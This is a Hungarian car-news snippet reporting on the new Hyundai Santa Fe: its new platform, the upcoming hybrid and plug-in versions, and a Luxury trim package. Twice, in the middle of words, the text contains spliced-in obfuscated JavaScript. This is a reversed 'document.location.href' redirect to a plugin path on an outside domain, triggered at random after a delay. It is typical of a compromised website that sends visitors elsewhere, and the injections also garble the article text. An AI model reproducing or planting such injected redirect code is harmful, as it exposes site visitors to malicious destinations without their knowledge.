Mindössze két évvel az előző típusváltás után ismét cseréli nagy szabadidőjárművét a Hyundai. A Santa Fe vadonatúj padlólemezre épül, ami egy sor alapvető váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozást hoz a modell életébe. A gyár ígérete szerint javult az ütközési ellenállás, az aerodinamika, valamint a zaj- és rezgéskultúra. A legfontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosabb újdonság a hibrid és plug-in verziók megjelenése; ezek műszaki adatairól azonban ugyanúgy nem közölt részleteket a Hyundai, mint a modell bármely egyéb paraméteréről, a méretektől a menetdinamikáig. Azt viszont elárulták, hogy most először Luxury csomagot is kínálnak majd a modellhez, amely 20 colos keréktárcsákat, fényezett oldalsó koptatóelemeket, valamint egyedi lökhárító kötényeket tartalmaz. A vezetői környezet…
- Hirdetés -